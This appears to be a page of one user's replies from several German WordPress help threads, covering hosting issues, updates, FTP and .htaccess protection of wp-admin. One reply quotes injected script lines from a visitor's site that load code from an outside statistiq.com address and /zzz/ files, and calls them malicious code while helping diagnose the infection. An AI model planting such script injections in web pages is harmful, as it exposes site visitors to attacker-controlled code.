ZitatKann ich irgendwas tun!?!?!?
Steht doch da - oder kriegste die Meldung über mehrere Tage angezeigt? Was meint der Hoster dazu?
ZitatPlease try again later.
Um schreiben oder kommentieren zu können, benötigen Sie ein Benutzerkonto.
Sie haben schon ein Benutzerkonto? Melden Sie sich hier an.
Jetzt anmeldenHier können Sie ein neues Benutzerkonto erstellen.
Neues Benutzerkonto erstellen ZitatKann ich irgendwas tun!?!?!?
Steht doch da - oder kriegste die Meldung über mehrere Tage angezeigt? Was meint der Hoster dazu?
ZitatPlease try again later.
ZitatHabe zuerst versucht die Seite mit dem Designer von World4you zu gestalten
ZitatAnschließend habe ich über World4you Wordpress installiert
ZitatNun sieht man auf meiner Seite immer, das was ich über den Designer gemacht habe
wenn ich das richtig deute, ist der Hintergrund folgendes: der Browser sieht auf Deinem Webspace eine index.html (mit dem Designer erstellt) und eine index.php (die Startseite von WordPress). Seit den Anfängen des Internets kommt *.html vor *.php, deshalb siehst Du noch immer die erst erstellte Seite bzw. deren Inhalte.
Du musst also vom Webspace die index.html entfernen, dann wird auch die WordPressseite angezeigt werden. Um dies zu bewerkstelligen, hast Du bei world4you entweder eine Art Dateimanager, wie Du es auch schon von Windows kennst, oder Du kannst auf den Webspace über FTP zugreifen. Da ich den Anbieter nicht kenne, kann ich Dir nicht sagen, was für Dich einfacher zu bewerkstelligen ist und/oder möglich ist.
OK, also: wenn ich den Quellcode Deiner Homepage anschaue, fallen mir die folgenden Zeilen auf:
Zitat<script language="JavaScript" type="text/javascript"> <!-- // SQ document.write("<"+"script language=\"JavaScript\" type=\"text/javascript\" src=\"http://statistiq.com/8685/?sessq=a2…n.height+%22%5C"></"+"SCRIPT>"); // --> </script> <script type="text/javascript" src="/zzz/gas.js"></script> </head> <script language="JavaScript" src="[URL="http://forum.wpde.org/view-source:ht…0.5,en-us;q=0.3"]/zzz/init.php?D=a2x1ZWdlcmxlYmVuLmF0LnZ1&L=de,en;q=0.8,de-de;q=0.5,en-us;q=0.3[/URL]" type="text/javascript"></script>
Das scheint von einer vorgeschalteten index.html zu stammen - trifft das zu?
Der Sucuri SiteCheck weist die Seite ebendfalls als befallen aus, ohne allerdings eine konkrete Bedrohung zu nennen.
Hoffe, das hilft Dir erst einmal weiter, um den Schadcode zu identifizieren - Du musst allerdings dahinter kommen, woher und wie der auf Deine Seite gelangt, erst dann hast Du die Lücke geschlossen!
Wie kommste darauf, dass das überhaupt eine WordPressseite ist?
Atahualpa und Suffusion sind 2 Beispiele, wo man soviele Einstellmöglichkeiten bekommt, dass es schon fast verwirrend ist. ![]()
Und was passiert, wenn Du F12 drückst?
Zitatbraucht mann da ne plugin==??
Nein, bloss ein Grafikprogramm, Paint reicht dazu vollkommen aus.
Wenn Du den Quellcode Deiner Seite anschaust, kannst Du sehen, welches Styleshhet aufgerufen wird.
Naja, zuerst wollte ich einfach schreiben, dass Du die DE-Edition von hier laden und einfach manuell das Update durchführen sollst. Natürlich, nachdem Du eventuell direkt an den Core-Dateien vorgenommenen Änderungen gesichert hast und auch von der Datenbank ein Backup gezogen hast. Um unliebsame Komplikationen zu vermeiden, solltest Du auch vor dem Upgrade alle Plugins deaktivieren, und danach erst schrittweise aktivieren.
Das ist eine Möglichkeit, den Du nach meinem besten Wissen so nutzen kannst.
Aber das beantwortet Deine Frage nicht, wieso das deutsche Update nicht automatisch angeboten wird. Ich kann hier nur mutmassen:
Hast Du eventuell ein Plugin für Mehrsprachigkeit im Einsatz - oder mal im Einsatz gehabt? Ich habe gerade kürzlich das erlebt, nachdem ich kurzfristig qTranslate aktiviert hatte. Seither wird mir auch nur das englische Update automatisch angeboten, was ich darauf zurückführe, dass dieses Plugin Englisch als Standardsprache setzt, wenn man es erst aktiviert.
Aber es stellen sich mir auch andere Fragen: zwischen der 3.1.2 und 3.3.1 gab es ja noch ein paar Zwisachenschritte. Wurde Dir erst bei der neuesten Version nur englisch angeboten, oder allenfalls vorher schon? Allgemein, was für Plugins setzt Du ein, welches Theme und hast Du vielleicht kürzlich das Theme gewechselt?
Was spricht eigentlich heute noch gegen die Verwendung von AuthType Digest?
FileZilla bietet ja auch die Option "Manueller Transfer" (im Menüpunkt Transfer) an, ich würde dort mal ein paar Versuche machen.
Von der Beschreibung her, könnte ich mir vorstellen, dass dies ein vorübergehendes Problem des Providers ist, mal dort auch ne Anfrage starten.
Da ich auch eine Website bei square7.ch liegen habe, möchte ich dann doch klarstellen, dass auch die nicht einfach eine Website löschen. Meine Site zB. habe ich seit dem vergangenene Oktober nicht angefasst, und sie ist noch da! Auch davor war sie ca. 6 Monate "verwaist", ich hatte keinerlei Schwierigkeiten damit.
Und das steht in den FAQ:
ZitatWerden meine Seiten irgendwann gelöscht, wenn ich mich länger nicht mehr eingeloggt habe? Nein, ansich nicht. Aber manchmal (etwa einmal halbjährlich) werden inaktive Konten deaktiviert.
Damit Dir das nicht passiert reicht es, wenn Du Dich zumindest 1x halbjährlich (alle 6 Monate) einloggst.
ZitatDen Grund dafür kannst du z.B hier nachlesen
http://playground.ebiene.de/initiati...ss-sicherheit/
Hille: So ein Quatsch - den Artikel von Sergej Müller kenne ich natürlich. Nur hat er niemals gesagt, der Schutz von wp-admin sei unsinnig. Mit Deiner verkürzten Fassung stiftest Du bei nicht so kundigen Lesern Verwirrung. Es wäre besser gewesen, Du hättest gleich auf den Artikel verwiesen.
Sichert man den gesamten Ordner /wp-admin/ mit einer .htaccess, so sperrt man damit beispielsweise auch die ganzen AJAX-Funktionalitäten von WordPress. Daher sollten die Zugriffe auf die Datei admin-ajax.php explizit von der Sperre ausgenommen werden:
Die Datei /wp-admin/css/install.css ist ein anderer Kandidat, mit dem ähnlich verfahren sollte
Via Dolorosa: ich halte diese Absicherung auch keinesfalls für "unsinnig", wie Hille geschrieben hat, daher kam meine Frage. Bin auf seine Antwort gespannt!
ZitatDas Verzeichnis /wp-admin per .htaccess zu schützen ist unsinnig.
Wer sagt das - und warum?
Na, dann blätter mal einen Tag zurück in diesem Forum (Plugins) - wurde gestern schon von jemand gefragt und es gab Antworten dazu.
Zitat
Dafür sind wir hier auch nicht zuständig, stelle die Frage bitte im wordpress.com Forum. Hier werden nur selbst gehostete WordPress-Installationen behandelt.
Hallo, also ich habe jetzt den ganzen morgen gebastelt. Nach einigen mails mit STRAT0, es wurde unter anderem geschrieben ich müsse in der htaccess Datei was ändern, bin ich hergegangen und habe Deinem Hinweis entsprechend die config geändert, also ohne Zusatz Wordpress. Hatte dann aber wieder das Problem, dass die Startseite richtig angezeigt wurde aber die weiteren Seiten nicht. Daraufhin habe ich die Permalinks auf Standard gestellt und siehe da die Weiterleitung auf die einzelnen Seiten gingen. Es fehlte dann das Hintergrundbild und das Kopfbild und die einzelnen Verlinkungen auf den Seiten musste ich ändern. Vielen Dank für Deine Hilfe. Schönen Tag
somaya: Keine Ahnung, was Du gemacht hast - ich habe jedenfalls nie was von "ändern der config" gesagt. Aber wenn es füre Dich jetzt stimmt, ist das gut - zumindest für Dich.
Um das Chaos für unbeteiligte spätere Leser wieder ein wenig zu entwirren:
Nichts stand mir ferner, als Dir Faulheit zu unterstellen - im Gegenteil, ich war drauf und dran, auch von den bunten Knöpfen anzufangen. Habe es dann sein lassen, weil es zu stark eine Unterstellung gewesen wäre - aber nun bestätigst Du es ja, also oute ich mich. ![]()